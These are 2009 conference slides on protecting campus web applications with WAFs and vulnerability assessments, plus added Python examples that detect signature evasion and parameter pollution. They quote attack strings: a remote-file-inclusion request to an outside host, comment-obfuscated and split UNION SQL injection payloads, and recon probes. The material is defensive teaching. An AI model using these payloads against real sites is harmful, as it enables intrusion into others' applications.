2009: Securing Applications With Web Application Firewalls and Vulnerability Assessments
Redactions:
- XSS escaping is much more complex than what is shown. See OWASP XSS Cheat Sheet
Speaker notes (dated 11/04/09):
  • Mention that this talk will be focused mostly on WAFs; ask if anyone is thoroughly disappointed
  • (Figures from 2009)
  • The smoking guy was the “boss” from lovelycharts.com. Notice that the intranet does not bypass the WAF
  • Scope Creep!
  • WAFs take a LOT of time. Too often I hear, “if we have a WAF, why do we need to write secure code?” One of the biggest surprises to us was how much time and effort is involved
  • Same goes for open source…
  • WAFs handle 4 out of 5 of these gracefully, RFI
  • AppScan/static analysis is difficult with a large number of small-purpose apps.
  • Mention IDS/IPS can’t inspect SSL traffic
  • This left us open when our device failed.
  • It’s no good if you can’t spend the time tuning after every alert. Mention the “strict profile” versus normal profile. Mention profiling reports!
  • SecureSphere Web Application Firewall Presentation, May 21, 2007, Imperva. Mentioned the hidden slide matrix
  • Outside scans may get blocked for other reasons.
  • Much more accurate for XSS protection. Correlation rules are sad, virtual patches are accurate
  • Inattentive? That just sounds weird
  • Note the single and double quote at the end of the name. If a signature is detected, then the WAF doesn’t request
  • Connection resets instead of error pages for certain classes
  • Fixed DWH, Library problem, caught
  • Having DB on same host as web server forces us to install an agent. Messed up parameters caused unknown param alerts: &amp;variable
  • -1.02 is not considered “numeric”
  • Fortify will do static analysis on your code if it is open source

Securing Campus Web Applications with Vulnerability Assessments (VA) and Web Application Firewalls (WAFs)
Neil Matatall | November 5, 2009
University of California, Irvine
OWASP Orange County Chapter Lead, Educause Effective Practices WG Member

Glossary
  • WAF = Web Application Firewall
  • IDS = Intrusion Detection System
  • IPS = Intrusion Prevention System
  • AppSec = Application Security
  • SOX, PCI, HIPAA, FERPA = Compliance
  • OWASP = Open Web Application Security Project
  • WASC = Web Application Security Consortium

Agenda
  • Introduction
  • Web Application Firewalls
  • Implementing Web Application Firewalls
  • Vulnerability Assessments
  • Synergy
  • WAF Evasion Techniques
  • Wrap Up

Let’s Make It Clear
  • We have used open source WAFs as well as commercial WAFs
  • I am here to sell you on the idea of WAFs, but not to sell you a WAF
  • I will try to confuse you
  • Every situation is different
  • Key phrase: it depends!

About UCI
  • Founded in 1965
    • ~27,631 students
    • ~14,228 employees
  • Rapidly expanding while our budget is rapidly shrinking
  • Recently started consolidating IT across the campus
    • The Security team was one of the first groups to work together across former business units

Security Is All About The Layers
  • No single solution that makes everything secure exists
  • When one layer fails, and it will, there should be a compensating strategy
This is commonly known as the “Defense in Depth” strategy.

Commonly Overheard Misconceptions of Application Security
  • “Our site is secure because it uses SSL”
  • “Our site is secure because we have a network firewall”
  • “A hacker will never do that”

Section: Web Application Firewalls

Visual Representation of WAFs
[diagram]

What a WAF is:
  • From http://www.owasp.org:
    • An appliance, web server plugin, or filter that applies a set of rules to an HTTP conversation
    • Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection
  • A WAF inspects the HTTP content at the application layer, beyond what a network firewall would typically inspect at the IP and transport layers

The OSI Stack
[diagram] The application set is handled by Web Application Firewalls; the transport set is handled by traditional network firewalls.

What a WAF is (Cont’d)
  • “HTTP-aware IPS/IDS on steroids”
  • A way to analyze the requests and responses for suspicious activity
  • A way to increase visibility of web traffic [1]
  • A debug tool [2]
  • An incredibly powerful, complex, and difficult beast
  [1] We’ve Been Blind to Attacks on Our Web Sites
  [2] Ryan Barnett: Why Did Our Web Application Crash? Leveraging WAF Logging Data

What a WAF is not
  • A “traditional” firewall
    • Firewalls generally inspect IP addresses and ports, layers 3 and 4
    • WAFs inspect HTTP requests/responses at layer 7
  • A magical device that works on its own
  • An end-all solution to all application security problems
  • An excuse to write insecure code

XKCD – Missing the Point
http://xkcd.com/538

Why You Need A WAF
  • 82% of Web applications have vulnerabilities [1]
  • 75% of all Internet attacks target applications [2]
  • PCI-DSS
    • 6.6: Installing a web-application layer firewall in front of public facing web applications
    • 10: Track and monitor all access to credit card data
  • Software vendors may not be willing (or even in business) to fix vulnerabilities
  [1] WhiteHat, statistic for initial examination; [2] Gartner Research

The Most Widespread Vulnerabilities in Web Applications
[chart] WASC - Web Application Security Statistics

Why WAFs Are Attractive in Higher Ed
  • We typically have a very diverse pool of code
  • Tight resources make fixing the code a painful process
  • Many small, single-purpose applications make alternative technologies difficult to use
  • Built-in user community
    • Campus groups
    • Educause Effective Practices Group
    • Mailing lists

Example Attack: What the WAF Sees
    GET ////?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1
    TE: deflate,gzip;q=0.3
    Connection: TE, close
    Host: www.somesite.com
    User-Agent: Mozilla/5.0
OWASP Top 10: #3 Malicious File Execution (RFI)

Section: Implementing Web Application Firewalls

Step One: ModSecurity
  • Apache module
  • “Negative” security model
    • Signature based: checks for known attacks
    • Similar to anti-virus
  • Open Source!
  • OWASP Core Rule Set: best starting point
  • Accepted as the best open source WAF
  • Sees the SSL traffic after Apache has decrypted the traffic

Before ModSecurity
[chart]

After ModSecurity
[chart]

Step Two: Taking the Dive…Vendors
  • ModSecurity was getting difficult to manage…
    • Only one person was trained to update the rules
    • Multiple instances meant multiple updates and upgrades
  • No protection for IIS, difficult for Windows
    • WebKnight did not meet our needs
  • The vendor products had many features ModSecurity did not have
    • Mainly, the Positive Security Model

Downside of Negative Security Model
  • ModSecurity uses only signature-based protection
  • Like AV, these can be bypassed with the smallest tweak
  • E.g. UNION SQL Injection Attack [1]
  • BLOCKED: /?id=1+union+select+1,2,3 /*
  • NOT BLOCKED: /?id=1/*union*/union /*select*/ select+1,2,3 --
    • After being processed, the request will become:
      • index.php?id=1/*uni X on*/union /*sel X ect*/ select+1,2,3 --
    • Query: “select * from somewhere where id=“ + id
      • Becomes: select * from somewhere where id=1 union select 1,2,3 --
  [1] Methods to Bypass a Web Application Firewall
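To make the signature-bypass point concrete, here is an added Python example (not from the slides and not ModSecurity's own code) that checks the two query strings quoted on the slide against a naive `union select` signature, first on the raw request and then after the comment stripping a MySQL parser would perform; the `normalize` helper is an assumed, simplified stand-in for a WAF's transformation pipeline.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed from the two request paths quoted on the slide.
BLOCKED_REQUEST = "/?id=1+union+select+1,2,3 /*"
EVASIVE_REQUEST = "/?id=1/*union*/union /*select*/ select+1,2,3 --"

# A minimal negative-model rule: the literal token sequence "union <whitespace> select".
SIGNATURE = re.compile(r"union\s+select", re.IGNORECASE)


def naive_detect(request_path: str) -> bool:
    """Signature-only check: URL-decode the request and look for the literal sequence."""
    return SIGNATURE.search(unquote_plus(request_path)) is not None


def normalize(sql_fragment: str) -> str:
    """Approximate what the database parser will see (assumed MySQL semantics):
    strip /* ... */ comments, which the parser treats as whitespace, then
    collapse runs of whitespace and lowercase the result."""
    text = re.sub(r"/\*.*?\*/", " ", sql_fragment, flags=re.DOTALL)
    return re.sub(r"\s+", " ", text).strip().lower()


def normalized_detect(request_path: str) -> bool:
    """The same signature applied after normalization; this catches the evasive variant."""
    return SIGNATURE.search(normalize(unquote_plus(request_path))) is not None


def id_param(request_path: str) -> str:
    """Extract the 'id' query parameter the way the application would."""
    query = urlsplit(request_path).query
    return parse_qs(query, keep_blank_values=True).get("id", [""])[0]


def effective_query(id_value: str) -> str:
    """The statement the slide's string concatenation hands to the database,
    shown after the database's own comment handling."""
    return "select * from somewhere where id=" + normalize(id_value)


if __name__ == "__main__":
    for label, req in (("BLOCKED", BLOCKED_REQUEST), ("NOT BLOCKED", EVASIVE_REQUEST)):
        print(label, req)
        print("  naive signature  :", naive_detect(req))
        print("  normalized first :", normalized_detect(req))
        print("  database sees    :", effective_query(id_param(req)))
```

The lesson is the one the slide draws: a signature is only as good as the transformations applied before it, and every layer that parses the input differently from the WAF is a gap.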
Step 1.5
  • Keeping ModSecurity up while deploying a vendor product
    • As we gradually moved hosts behind the vendor WAF, we left ModSecurity up while the vendor WAF was in learning mode
    • We removed ModSecurity once we were certain that the vendor device was functioning better than ModSecurity
  • Surprisingly, nobody noticed a performance hit when running the network device in tandem with ModSecurity

Common Features of Commercial Products
  • “Positive Security Model”
    • Learning mode: tries to profile applications and learn “normal” behavior
    • Also employs the negative security model as well
  • User tracking: record logins and associate traffic with user names (DB and Web)
  • Reporting
  • Decrypt SSL traffic

Positive Security Model Examples
  • Parameter Type Violation: Unexpected Groups: Asterix, Numeric, Parenthesis
  • Parameter Value Length Violation: Size=10, Max=3
  • Unauthorized Method: PUT
  • Cookie Poisoning: Cookie value expected=a, Observed=b
  • Unknown Parameter: _SERVER[DOCUMENT_ROOT]

Tips & Tricks
  • Pair prod/test servers to reduce profiling time
  • Ignore search crawlers first!
  • I know this sounds like blasphemy, but start with loose restrictions and tighten as you go
  • Know thyself: application owners must be involved
  • An application security expert MUST be at the helm if you want to use the device effectively
  • Proactive monitoring saves a great deal of time in the long run

WAF Lifecycle
  • First, tune the alerts to a manageable amount
  • Next, spend a good amount of time simply learning the applications and tuning the WAF
    • The main goal is to learn all parameter names
  • Slowly tighten restrictions
    • Start applying anything you removed in the first phase
    • Enable harsher responses, such as IP or user blocking
  • The ultimate goal is to have a WAF with no exceptions
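The positive security model of the last three slides, as an added Python example (not from the slides or from any vendor product): a learning pass builds a per-URL profile of methods, parameter names, character groups and maximum lengths, and an enforcement pass emits alerts worded like the examples on the slide, including the Unknown Parameter alert the RFI request on slide 18 would trigger. The group names, the cart page and all traffic are constructed; the `numeric_aware` switch shows the fix for the "-1.02 is not considered numeric" false positive recorded in the speaker notes.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Character groups, loosely modelled on the alert text quoted on the slide
# ("Unexpected Groups: Asterix, Numeric, Parenthesis"); the group names are assumptions.
GROUPS = [
    ("Alpha", re.compile(r"[A-Za-z]")),
    ("Numeric", re.compile(r"[0-9]")),
    ("Space", re.compile(r"\s")),
    ("Asterisk", re.compile(r"\*")),
    ("Parenthesis", re.compile(r"[()]")),
    ("Quote", re.compile(r"['\"]")),
    ("Sign", re.compile(r"[+-]")),
    ("Dot", re.compile(r"\.")),
]
# A parameter whose every learned value was numeric is validated as a number, so
# "-1.02" passes even though '-' and '.' never appeared during learning.
NUMBER_RE = re.compile(r"-?[0-9]+(\.[0-9]+)?$")


def groups_of(value):
    """Map each character of a value to its group; unlisted characters become 'Other'."""
    found = set()
    for ch in value:
        for name, pattern in GROUPS:
            if pattern.match(ch):
                found.add(name)
                break
        else:
            found.add("Other")
    return found


def parse_request(line):
    """Split 'GET /x.php?a=1 HTTP/1.1' into (method, path, [(name, value), ...])."""
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    return method, parts.path, parse_qsl(parts.query, keep_blank_values=True)


def learn(profile, request_lines):
    """Learning mode: per URL, record the methods seen and, per parameter,
    the character groups, the longest value and whether every value was numeric."""
    for line in request_lines:
        method, path, params = parse_request(line)
        url = profile.setdefault(path, {"methods": set(), "params": {}})
        url["methods"].add(method)
        for name, value in params:
            p = url["params"].setdefault(name, {"groups": set(), "max_len": 0, "numeric": True})
            p["groups"] |= groups_of(value)
            p["max_len"] = max(p["max_len"], len(value))
            p["numeric"] = p["numeric"] and NUMBER_RE.match(value) is not None
    return profile


def check(profile, line, numeric_aware=True):
    """Enforcement mode: return alerts worded like the slide's examples."""
    method, path, params = parse_request(line)
    url = profile.get(path)
    if url is None:
        return ["Unknown URL: %s" % path]
    alerts = []
    if method not in url["methods"]:
        alerts.append("Unauthorized Method: %s" % method)
    for name, value in params:
        p = url["params"].get(name)
        if p is None:
            alerts.append("Unknown Parameter: %s" % name)
            continue
        if len(value) > p["max_len"]:
            alerts.append("Parameter Value Length Violation: %s Size=%d, Max=%d"
                          % (name, len(value), p["max_len"]))
        if numeric_aware and p["numeric"] and NUMBER_RE.match(value):
            continue  # a well-formed number never needs a character-group check
        unexpected = groups_of(value) - p["groups"]
        if unexpected:
            alerts.append("Parameter Type Violation: %s Unexpected Groups: %s"
                          % (name, ", ".join(sorted(unexpected))))
    return alerts


# Constructed learning traffic: a fictitious cart page plus the slide's name lookup.
LEARNED_TRAFFIC = [
    "GET /cart/add.php?id=17&qty=2&price=19.99 HTTP/1.1",
    "GET /cart/add.php?id=250&qty=10&price=250.00 HTTP/1.1",
    "GET /cart/add.php?id=8&qty=1&price=7 HTTP/1.1",
    "GET /somefile.html?name=Neil%20Matatall HTTP/1.1",
]
PROFILE = learn({}, LEARNED_TRAFFIC)

# Constructed enforcement-phase requests; parameter names and values follow the slides
# and speaker notes, and example.invalid is a placeholder host.
RFI_REQUEST = "GET /cart/add.php?id=17&_SERVER[DOCUMENT_ROOT]=http://example.invalid/id.txt HTTP/1.1"
NEGATIVE_PRICE = "GET /cart/add.php?id=17&qty=2&price=-1.02 HTTP/1.1"
QUOTED_NAME = "GET /somefile.html?name=Neil%20Matatall%27%22 HTTP/1.1"
ESCAPED_AMP = "GET /cart/add.php?id=17&amp;qty=2 HTTP/1.1"   # HTML-escaped '&' from a broken link
```

Running `check(PROFILE, QUOTED_NAME)` gives both a length and a type violation; an operator who adds that value to the profile has just taught the WAF that quotes are normal for `name`, which is the weakening described under WAF Evasion Techniques below.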
WAF Options
  • Options: server plugin, network device, code
  • Open Source: ModSecurity, PHPIDS, WebKnight, OWASP ESAPI
  • Vendor: Imperva, Breach, F5
  • and many more: http://www.xiom.com/waf/products

Deployment Options Matrix
[matrix figure] Web Application Firewall Deployment Mode Considerations: Inline vs. Out-of-Line

Deployment Options
  • Transparent Inline Bridge
    • Supports full enforcement
    • High performance, low latency
    • Fail-open interfaces
  • Transparent & Reverse Proxy
    • High performance for content modification
    • URL rewriting, cookie signing, SSL termination
  • Non-inline Deployment
[diagram: Non-Inline, Reverse Proxy and Inline Bridge placements of SecureSphere between the Internet, the switch and the data center; from Imperva customer slides]

Which WAF is Right for You?
  • Things to consider:
    • How many applications do you have?
    • What types of servers do your applications run on?
    • How much time do you have to devote to this?
    • Do you have someone knowledgeable in application security?
    • How much money do you have?
  • Review the Web Application Firewall Evaluation Criteria from WASC (webappsec.org)

Bonus: Database Monitoring
  • Run assessments on DB server configuration
  • Audit all access to tables, logins, etc.
  • Forensic capabilities: records each query
  • Enforce SOX, PCI, HIPAA, etc.
  • Restrict access based on time, location, etc.
  • Reports: access to sensitive tables, assessment results, new accounts created

Section: Vulnerability Assessments

Vulnerability Assessments
  • Use automated tools to check for the common vulnerabilities in applications
  • Generally sends a request meant to cause the application to behave incorrectly
    • For XSS it usually sends <script> tags to see if < becomes &lt;
    • For SQL Injection it sends ‘;”-= to see if an exception is thrown
  • Some can scan web services
  • Some can perform penetration testing

Vulnerability Assessment Strategies
  • Manual
    • Use proxies and other tools to manually assess the posture of the application
  • Automated
    • Give a tool a starting point and let it discover
    • Crawling, analyzing, and testing phases
  • SaaS
    • Continually test the application for vulnerabilities

Scan When
  • PCI-DSS requires a penetration test once a year
  • We integrate AppScan into our development lifecycle
    • All new applications undergo a full scan
    • All “major changes” undergo a full re-scan
    • All minor changes require a small, focused scan

Scan What
  • For new or critical applications, we scan the entire application
    • This can involve multiple sets of credentials
  • Production or test machines?
    • We scan test machines
    • The test environment must mirror the production environment
  • Inside or outside the network?
    • Always done from inside the network

Section: Synergy

Synergy Bliss
  • AppScan
    • Verified vulnerabilities would be “virtually patched” by importing scan results
  • Splunk
    • Send events over syslog to a central log server to correlate events across all layers and hosts
    • Correlate audit data to system events (in progress)
  • Intrusion Prevention System
    • Create signatures for blatant attacks and block them at a lower level

Synergy Bliss Continued
  • Scan what?
    • Verify that all URLs learned by your WAF have been tested by your scanner
    • or: use the scanner to explore your site
  • Scan when?
    • You can use the statistics generated by your WAF to detect changes to applications (lifecycle FAIL)
  • Ryan Barnett: Scanner and WAF Data Sharing

Section: WAF Evasion Techniques

New Form of Social Engineering?
  • I noticed an abnormally large amount of “Parameter Type” and “Parameter Value Length” violations where “normal” input had “suspicious” data
  • An inattentive operator may have added these to the profile, thus weakening the WAF for an upcoming attack
  • “Sounds like another method of social engineering to me. Victimizing the managers who demand uptime and ease of use over security”

WAF Weakening Flavors
  • Wolf in sheep’s clothing: the attacker adds suspicious characters to seemingly harmless data
    • GET /somefile.html?name=Neil Matatall’”
  • Tricking the profiler, while the app is still in learning mode, into learning potentially malicious behavior
    • Do recon by adding blatant attacks (cmd.exe, xp_cmdshell, <script>)

Bypassing WAFs
  • HTTP Parameter Pollution
    • Web servers handle “pollution” differently
    • The WAF must know the underlying architecture to handle this accordingly
    • E.g. /index.jsp?par1=val1&par1=val2
  Source: Methods to Bypass a Web Application Firewall
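The parameter-pollution point, as an added Python example (not from the slides or from any WAF product): it resolves the slide's `par1=val1&par1=val2` under three assumed back-end conventions (first occurrence, last occurrence, all occurrences comma-joined), shows that inspecting each occurrence on its own misses a payload split across occurrences while reassembling the value the way the back end does catches it, and raises a positive-model alert on any duplicated name. Which real platform follows which convention is an assumption to verify against your own stack; the split payload is constructed.

```python
import re
from urllib.parse import parse_qsl

# How a back end resolves duplicate parameter names. The mapping of platforms to
# rules is deliberately left out: establish it for your own servers, then configure
# the WAF to reassemble values the same way.
BACKEND_RULES = {
    "first": lambda values: values[0],
    "last": lambda values: values[-1],
    "join": lambda values: ",".join(values),
}
SIGNATURE = re.compile(r"union\s+select", re.IGNORECASE)


def grouped(query: str) -> dict:
    """Collect every value for every parameter name, in order of appearance."""
    out = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        out.setdefault(name, []).append(value)
    return out


def effective_params(query: str, backend: str) -> dict:
    """The name -> value mapping the application actually sees on that back end."""
    rule = BACKEND_RULES[backend]
    return {name: rule(values) for name, values in grouped(query).items()}


def strip_comments(text: str) -> str:
    """Drop /* ... */ comments and collapse whitespace, as an SQL parser would."""
    return re.sub(r"\s+", " ", re.sub(r"/\*.*?\*/", " ", text)).strip()


def naive_matches(query: str) -> bool:
    """Inspect each raw occurrence separately, the way a WAF unaware of HPP would."""
    return any(SIGNATURE.search(v) for _, v in parse_qsl(query, keep_blank_values=True))


def backend_aware_matches(query: str, backend: str) -> bool:
    """Inspect the value as the named back end would assemble it."""
    return any(SIGNATURE.search(strip_comments(v))
               for v in effective_params(query, backend).values())


def hpp_alerts(query: str) -> list:
    """Positive-model style alert: a parameter name that appears more than once."""
    return ["Duplicate Parameter: %s (%d occurrences)" % (name, len(values))
            for name, values in grouped(query).items() if len(values) > 1]


# Constructed samples: the slide's own example and a payload split across occurrences
# so that no single occurrence contains the signature.
SLIDE_EXAMPLE = "par1=val1&par1=val2"
SPLIT_PAYLOAD = "id=1/*&id=*/union/*&id=*/select 1,2"

if __name__ == "__main__":
    for backend in BACKEND_RULES:
        print(backend, effective_params(SLIDE_EXAMPLE, backend),
              "split payload detected:", backend_aware_matches(SPLIT_PAYLOAD, backend))
    print(hpp_alerts(SPLIT_PAYLOAD))
```

Only the comma-joining back end turns the split occurrences into a single `union select`, so a WAF that assumes first-occurrence semantics in front of such a server sees nothing; alerting on duplicated names catches the pattern regardless of back end.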
Section: Wrap Up

Lessons Learned
  • The WAF takes a great amount of time for tuning
  • Running in bridge mode will cause network interruptions

WAF Issues Encountered
  • Caused some networking issues with availability monitors
  • Sometimes it would cause erratic behavior when blocking responses

Because the WAF Says So
  • There have been a few cases where we had to bend to the WAF’s demands
    • Non-standard query strings lessened the WAF’s coverage
    • Re-architect VLANs
    • SVN had to be moved to another port
    • Parameter names had to be adjusted

WAF Wins
  • NO BREACHES!!!! *knock on wood
  • Caught outgoing SSNs and CCs
  • Assessments: Scuba failed, SecureSphere wins
  • Collaboration with the campus networking group resulted in signatures being added to the IDS
  • Caught campus-wide no-nos
    • Developers were using GET when POST was required
    • Servers were leaking code; developers didn’t know
  • Helped debug application issues (scope creep!)

Side Benefits
  • Encourages the separation of Web/DB servers
  • First real throughput numbers
  • Improved code quality
  • Discovered broken links
  • Discovered longest response times

Leaving Thoughts…
  • Positive security models document parameters, values, and bounds
    • What if you could do full input validation in the WAF?
  • Complex data types? Email addresses? Filenames? Phone numbers? Currency?
  • Access management?
    • In a large number of cases, all authorization decisions can be made based on parameters/cookies/session information

References
  • WAFs
    • Open Source
      • ModSecurity
    • Vendors
      • Imperva, Breach, F5
  • Vulnerability Assessments
    • Open Source
      • Joomla, Fortify* Open Review Project
    • Vendor
      • WhiteHat Security, IBM AppScan, HP WebInspect, Cenzic, NT Objectives

References Cont’d
  • Web Application Firewall Evaluation Criteria
    • http://www.webappsec.org/projects/wafec/
  • Web Application Scanner Evaluation Criteria
    • http://projects.webappsec.org/Web-Application-Security-Scanner-Evaluation-Criteria

References Cont’d
  • We’ve Been Blind to Attacks on Our Web Sites
  • Why Did Our Web Application Crash? Leveraging WAF Logging Data
  • Scanner and WAF Data Sharing
  • Web Application Security Statistics
  • Methods to Bypass a Web Application Firewall
  • Web Application Firewall Products
  • Web Application Firewall Deployment Mode Considerations
  • Web Application Firewall Evaluation Criteria
  • Application Scanner Evaluation Criteria
  • Approved Scanning Vendors
  • xkcd: Security

Copyright Neil Matatall 2009. This work is the intellectual property of the author. Permission is granted for this material to be shared for non-commercial, educational purposes, provided that this copyright statement appears on the reproduced materials and notice is given that the copying is by permission of the author. To disseminate otherwise or to republish requires written permission from the author.